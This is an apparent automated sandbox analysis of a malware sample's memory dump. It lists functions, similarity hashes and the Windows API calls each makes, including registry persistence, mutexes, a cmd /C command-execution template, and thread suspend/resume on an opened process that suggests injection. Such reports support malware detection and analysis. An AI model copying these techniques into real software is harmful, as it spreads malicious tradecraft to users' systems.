    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3F95, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80 Total matches: 37memorystring
Similarity
  • Total matches: 37
  • API ID: HeapFree$RtlAllocateHeaplstrcmpi
  • String ID: Main
  • API String ID: 2523190637-521822810
  • Opcode ID: f2d70ba1db336b0a4ac6973dd472b45d7992a95be766767dbdcbf8c120d66562
  • Instruction ID: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
  • Opcode Fuzzy Hash: 8DF095610946C3D35417545580B03B89004AFD22F2C4D43FAE9303D1CB7E1235D7765F
  • Instruction Fuzzy Hash: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
APIs
    • Part of subcall function 001DDAD4: memcpy.NTDLL(00000000,00000084,00000084,001CD4DC,00000000,00000000,001DDB4C,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001), ref: 001DDAF2
    • Part of subcall function 001DDAD4: memset.NTDLL ref: 001DDB24
  • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
  • lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C5816: lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
    • Part of subcall function 001C5816: HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
    • Part of subcall function 001C5816: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
    • Part of subcall function 001C5816: lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
    • Part of subcall function 001C5816: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
    • Part of subcall function 001C5816: Sleep.KERNEL32(0000000A), ref: 001C58F2
    • Part of subcall function 001C5816: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C3F4D: RegCloseKey.ADVAPI32(?,?,?,001C403B,00000000,?,?,00000000,00000000,-00000008), ref: 001C3F87
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4202, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63 Total matches: 53memoryregistry
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAF14, Relevance: 7.7, APIs: 5, Instructions: 174 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8B4E, Relevance: 7.6, APIs: 5, Instructions: 125 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C45F0, Relevance: 7.6, APIs: 5, Instructions: 121 Total matches: 58memoryregistrysynchronization
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7878, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C439B, Relevance: 7.6, APIs: 5, Instructions: 98 Total matches: 56timememory
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9F0B, Relevance: 7.6, APIs: 5, Instructions: 95 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C44E2, Relevance: 7.6, APIs: 5, Instructions: 90 Total matches: 117synchronization
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAD95, Relevance: 7.6, APIs: 5, Instructions: 85 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C59D7, Relevance: 7.6, APIs: 5, Instructions: 83 Total matches: 27memorytime
Similarity
  • Total matches: 27
  • API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2335115045-0
  • Opcode ID: 87b7f9457d6eb4fb8a765cd00379997a4ae998d37287d2c68f8de9ad653ea43e
  • Instruction ID: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
  • Opcode Fuzzy Hash: 73F08BB11645925BD10230500D063B7F90AFBB13EAC4DFE12DD20342AB3F8321266BAC
  • Instruction Fuzzy Hash: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5A01
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5A14
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5A25
  • RtlAllocateHeap.NTDLL(00000000,001EB264,?), ref: 001C5A90
  • InterlockedIncrement.KERNEL32(001EB25C), ref: 001C5AA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC4E7, Relevance: 7.6, APIs: 5, Instructions: 81 Total matches: 95
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6D18, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C848E, Relevance: 7.6, APIs: 5, Instructions: 67 Total matches: 56memorysynchronization
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C11B3, Relevance: 7.6, APIs: 5, Instructions: 65 Total matches: 61filememory
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
